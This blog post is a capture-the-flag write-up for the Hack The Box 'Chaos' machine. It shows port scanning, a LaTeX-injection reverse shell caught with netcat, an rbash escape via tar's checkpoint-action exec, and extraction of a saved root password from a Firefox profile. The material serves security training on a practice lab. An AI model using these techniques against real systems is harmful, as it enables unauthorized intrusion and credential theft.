Hack The Box writeup – Chaos

Presenting Chaos. A nice machine which is a little CTFish but a lot of fun.

As usual we start with masscan.

root@kali:~/htb/chaos# masscan -p1-65535,U:1-65535 10.10.10.120 --rate=1000 -e tun0 > masscan.txt

Starting masscan 1.0.4 (http://bit.ly/14GZzcT) at 2019-05-28 20:27:57 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
root@kali:~/htb/chaos# cat masscan.txt                                       
Discovered open port 110/tcp on 10.10.10.120                                   
Discovered open port 995/tcp on 10.10.10.120                                   
Discovered open port 80/tcp on 10.10.10.120                                    
Discovered open port 143/tcp on 10.10.10.120                                   
Discovered open port 993/tcp on 10.10.10.120                                   
Discovered open port 10000/tcp on 10.10.10.120                                 
Discovered open port 10000/udp on 10.10.10.120 

Port 80 is open, let’s run gobuster to see what we can find.

root@kali:~/htb/chaos# gobuster -u http://10.10.10.120 -w /usr/share/wordlists/dirb/common.txt 

=====================================================
Gobuster v2.0.1              OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://10.10.10.120/
[+] Threads      : 10
[+] Wordlist     : /usr/share/wordlists/dirb/common.txt
[+] Status codes : 200,204,301,302,307,403
[+] Timeout      : 10s
=====================================================
2019/05/28 16:34:25 Starting gobuster
=====================================================
/.hta (Status: 403)
/.htpasswd (Status: 403)
/.htaccess (Status: 403)
/index.html (Status: 200)
/javascript (Status: 301)
/server-status (Status: 403)
/wp (Status: 301)
=====================================================
2019/05/28 16:34:45 Finished
=====================================================

Interesting results, we do see /wp which indicates the webserver could be running wordpress. Browsing to /wp we can see a wordpress directory within in. Now browsing to /wp/wordpress reveals a blog post written by author: human which is password protected. This is where its a bit of a guessing game. Trying the password “human” works and reveals a username and password for webmail.

Let’s use evolution email client on port 995 ssl/imap Dovecot imapd (Ubuntu). We find a draft email with the following contents.

Now the objective is to decrypt the enim_msg.txt file using the logic that that was used to encrypt it in the first place. This is the decrypt file that can be used to decrypt the message. The password/secret for the decryption is “sahay” as mentioned in that email.

import os
from Crypto import Random
from Crypto.Cipher import AES
from Crypto.Hash import SHA256
from base64 import b64decode

def main():
    filename = "enim_msg.txt"
    chunksize = 16*1024
    hasher = SHA256.new("sahay".encode('utf-8'))
    key = hasher.digest()
    
    with open(filename, 'rb') as infile:
        file_size = int(infile.read(16))
        IV =infile.read(16)
        while True:    
            chunk = infile.read(chunksize)
            if len(chunk) == 0:
                break
            elif len(chunk) % 16 != 0:
                chunk += b' ' * (16 - (len(chunk) % 16))
                
            cipher = AES.new(key, AES.MODE_CBC, IV)
            print cipher.decrypt(chunk)


            

if __name__ == "__main__":
    main()

We run the decryptor python code on the message file and base64 decode it to reveal the contents.

root@kali:~/htb/chaos# python decrypt.py enim_msg.txt | base64 -d
Hii Sahay

Please check our new service which create pdf

p.s - As you told me to encrypt important msg, i did :)

http://chaos.htb/J00_w1ll_f1Nd_n07H1n9_H3r3

Thanks,
Ayush

We can now add 10.10.10.120 chaos.htb to our /etc/hosts file and browse to that url. It shows us a Latex PDF creator plugin page.

After a little trial and error we identify that test3 template is vulnerable. We send our reverse shell text and click create pdf. Our nc listener has now caught a shell.

root@kali:~/htb/chaos# nc -nvlp 1234
listening on [any] 1234 ...
connect to [10.10.14.23] from (UNKNOWN) [10.10.10.120] 54932
/bin/sh: 0: can't access tty; job control turned off
$ python -c 'import pty;pty.spawn("/bin/bash")';
www-data@chaos:/var/www/main/J00_w1ll_f1Nd_n07H1n9_H3r3/compile$ whoami
whoami
www-data
www-data@chaos:/var/www/main/J00_w1ll_f1Nd_n07H1n9_H3r3/compile$ 

We can now switch user to ayush using the password from the web blog and capture the user flag. We get dropped into a restrictive rbash shell though. We need to escape it to get to our user flag.

Using the tar > shell command in https://gtfobins.github.io/gtfobins/tar/#shell we can get a better shell. We also then can update the PATH variable to get a more robust shell.

root@kali:~/htb/chaos# nc -nvlp 1234
listening on [any] 1234 ...
connect to [10.10.14.23] from (UNKNOWN) [10.10.10.120] 54934
/bin/sh: 0: can't access tty; job control turned off
$ python -c 'import pty;pty.spawn("/bin/bash")';
www-data@chaos:/var/www/main/J00_w1ll_f1Nd_n07H1n9_H3r3/compile$ whoami
whoami
www-data
www-data@chaos:/var/www/main/J00_w1ll_f1Nd_n07H1n9_H3r3/compile$ su ayush
su ayush
Password: jiujitsu

ayush@chaos:/var/www/main/J00_w1ll_f1Nd_n07H1n9_H3r3/compile$ whoami
whoami
rbash: /usr/lib/command-not-found: restricted: cannot specify `/' in command names
ayush@chaos:/var/www/main/J00_w1ll_f1Nd_n07H1n9_H3r3/compile$ tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
<ull --checkpoint=1 --checkpoint-action=exec=/bin/sh          
tar: Removing leading `/' from member names
$ export PATH="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/bin"
export PATH="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/bin"
$ whoami
whoami
ayush
$ cd ~/
cd ~/
$ ls
ls
mail  user.txt
$ cat user.txt
cat user.txt
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

Now onto root. Inside /home/ayush folder we see something interesting.

$ pwd
pwd
/home/ayush/.mozilla/firefox
$ ls -la
ls -la
total 20
drwx------  4 ayush ayush 4096 Sep 29  2018  .
drwx------  4 ayush ayush 4096 Sep 29  2018  ..
drwx------ 10 ayush ayush 4096 Oct 27  2018  bzo7sjt1.default
drwx------  4 ayush ayush 4096 Oct 15  2018 'Crash Reports'
-rw-r--r--  1 ayush ayush  104 Sep 29  2018  profiles.ini

We can use firefox decryptor at https://github.com/unode/firefox_decrypt/tree/0.7.0. So archive the .mozilla directory and send it over to your Kali using netcat. Then run the following. When prompted for a password, use the password for ayush that was obtained in the web blog.

root@kali:~/htb/chaos/firefox_decrypt# python firefox_decrypt.py ../home/ayush/.mozilla/firefox

Master Password for profile ../home/ayush/.mozilla/firefox/bzo7sjt1.default: 

Website:   https://chaos.htb:10000
Username: 'root'
Password: 'Thiv8wrej~'

The use that root password to switch to root and capture the root flag.

$ su root
su root
Password: Thiv8wrej~

root@chaos:/home/ayush/.mozilla/firefox# cd /root
cd /root
root@chaos:~# ls
ls
root.txt
root@chaos:~# cat root.txt
cat root.txt
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s